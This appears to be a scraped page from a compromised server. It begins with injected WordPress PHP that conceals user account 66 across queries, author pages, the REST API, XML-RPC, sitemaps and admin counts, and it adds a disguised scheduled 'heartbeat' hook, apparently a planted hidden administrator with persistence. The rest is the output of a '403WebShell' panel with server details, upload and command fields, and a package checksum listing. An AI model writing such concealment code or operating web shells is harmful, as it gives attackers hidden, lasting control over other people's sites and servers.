add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 66; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 66 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 66 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 66; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 66; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/66(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); 403WebShell
403Webshell
Server IP : 167.235.224.122  /  Your IP : 216.73.216.110
Web Server : Apache/2.4.58 (Ubuntu)
System : Linux newplayground 6.8.0-136-generic #136-Ubuntu SMP PREEMPT_DYNAMIC Wed Jul 1 21:33:11 UTC 2026 aarch64
User : deploy ( 1000)
PHP Version : 8.4.23
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : OFF
Directory :  /var/lib/dpkg/info/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/lib/dpkg/info/python3-serial.md5sums
4f1a352ecbcfb822a528b6d2296467e1  usr/bin/pyserial-miniterm
9169613dab9b1623c80b84036180bab9  usr/bin/pyserial-ports
be7ce5ccfebb5b466952781c5ab9f6db  usr/lib/python3/dist-packages/pyserial-3.5.egg-info/PKG-INFO
68b329da9893e34099c7d8ad5cb9c940  usr/lib/python3/dist-packages/pyserial-3.5.egg-info/dependency_links.txt
8ef4346ff5707ee78ecb4d13a68efeca  usr/lib/python3/dist-packages/pyserial-3.5.egg-info/entry_points.txt
c84a5e5e1dce2139ae4d3b88d3be65b1  usr/lib/python3/dist-packages/pyserial-3.5.egg-info/requires.txt
12a90ddc12e71614c3b7a6409f58ac46  usr/lib/python3/dist-packages/pyserial-3.5.egg-info/top_level.txt
81d1a2a8ae5bbcaf607412323c7c90cd  usr/lib/python3/dist-packages/serial/__init__.py
476aa171511c1f130aa5513d2f0862dd  usr/lib/python3/dist-packages/serial/__main__.py
c31ec8e29296467c1978094952d28a7a  usr/lib/python3/dist-packages/serial/rfc2217.py
59e55486c4a3e013eb0bc359d24bd2cb  usr/lib/python3/dist-packages/serial/rs485.py
96151ae352e10b2e1cb80921d87a4480  usr/lib/python3/dist-packages/serial/serialcli.py
e54e8202a2eda76f7d4d17a200907ed1  usr/lib/python3/dist-packages/serial/serialjava.py
7848e35189b70543f0894c11309f98f9  usr/lib/python3/dist-packages/serial/serialposix.py
80d4e31e55df3aae9686eb8847a9255e  usr/lib/python3/dist-packages/serial/serialutil.py
efaa76aceb36f7373a78bede233fe36e  usr/lib/python3/dist-packages/serial/serialwin32.py
ea5725add92c439922476341340d2c13  usr/lib/python3/dist-packages/serial/threaded/__init__.py
d41d8cd98f00b204e9800998ecf8427e  usr/lib/python3/dist-packages/serial/tools/__init__.py
185ed46d5c8b28f14410344d4be4e42e  usr/lib/python3/dist-packages/serial/tools/hexlify_codec.py
10b2d669a0fcb060406ec86e0ee81400  usr/lib/python3/dist-packages/serial/tools/list_ports.py
966bb5319b67ab0316eb221df9c69c2d  usr/lib/python3/dist-packages/serial/tools/list_ports_common.py
ab5f3f0b0a53bfbc51479cebe0df48e4  usr/lib/python3/dist-packages/serial/tools/list_ports_linux.py
c142ac0c8aae6099e1e2822259dea9c7  usr/lib/python3/dist-packages/serial/tools/list_ports_osx.py
95a177085d613947da67a8d7f9957408  usr/lib/python3/dist-packages/serial/tools/list_ports_posix.py
14deeced375d434edb2e2e94787cc1d6  usr/lib/python3/dist-packages/serial/tools/list_ports_windows.py
5eaaf1ca75a5b9cc82d3389d13cde556  usr/lib/python3/dist-packages/serial/tools/miniterm.py
d41d8cd98f00b204e9800998ecf8427e  usr/lib/python3/dist-packages/serial/urlhandler/__init__.py
a7af1b738d52c7e6d65a45de07b24d85  usr/lib/python3/dist-packages/serial/urlhandler/protocol_alt.py
35eba230d51ad19d43cd0adab9fe57a5  usr/lib/python3/dist-packages/serial/urlhandler/protocol_cp2110.py
060e94e3b9bbfd02f2f7df57fad0e106  usr/lib/python3/dist-packages/serial/urlhandler/protocol_hwgrep.py
38195e0320964c9d8baa0afe2c20631d  usr/lib/python3/dist-packages/serial/urlhandler/protocol_loop.py
0420f100591660830345e3f0e23b1df0  usr/lib/python3/dist-packages/serial/urlhandler/protocol_rfc2217.py
af63d2389fa68e7ee5c8a8b2e728394d  usr/lib/python3/dist-packages/serial/urlhandler/protocol_socket.py
c9be17bb80d1e3be577281e808a9a814  usr/lib/python3/dist-packages/serial/urlhandler/protocol_spy.py
55998056526fb6408765e6ff130dec94  usr/lib/python3/dist-packages/serial/win32.py
b1985c574ef07228bf6ebb5bd5bc05a3  usr/share/doc/python3-serial/README.rst
fefaf3d3db7ea3e9e34e3a019e4a59f1  usr/share/doc/python3-serial/changelog.Debian.gz
dac71b6b15bcce51540d762b421da816  usr/share/doc/python3-serial/copyright
1a55d0ce33aae842713a29a6d68556e5  usr/share/doc/python3-serial/examples/at_protocol.py
49d645356830a36d9c7d5f982740d125  usr/share/doc/python3-serial/examples/port_publisher.py
5ba0fbf2fbfa2ca520919645a5cbc203  usr/share/doc/python3-serial/examples/port_publisher.sh
1c1e2538bb9686534a1c59fe46cb526f  usr/share/doc/python3-serial/examples/rfc2217_server.py
9e219c4c9e961d1cc18add8385b79484  usr/share/doc/python3-serial/examples/setup-miniterm-py2exe.py
93b7ee395aa162c754c120f4c9e6ca1b  usr/share/doc/python3-serial/examples/setup-rfc2217_server-py2exe.py
50d10afb633bb829141147ce1d9a9e58  usr/share/doc/python3-serial/examples/setup-wxTerminal-py2exe.py
288f42bb44727d98e8a2652906852a8d  usr/share/doc/python3-serial/examples/tcp_serial_redirect.py
e42dc1fca2e3cfcdb9ac4e012af67165  usr/share/doc/python3-serial/examples/wxSerialConfigDialog.py
dccad3971e1d63ebd125a00a8b8afcd0  usr/share/doc/python3-serial/examples/wxSerialConfigDialog.wxg
7a857711727a1635fd2efccd979454d9  usr/share/doc/python3-serial/examples/wxTerminal.py
016b6d0e1931318aac7ce9f0bcd97812  usr/share/doc/python3-serial/examples/wxTerminal.wxg

Youez - 2016 - github.com/yon3zu
LinuXploit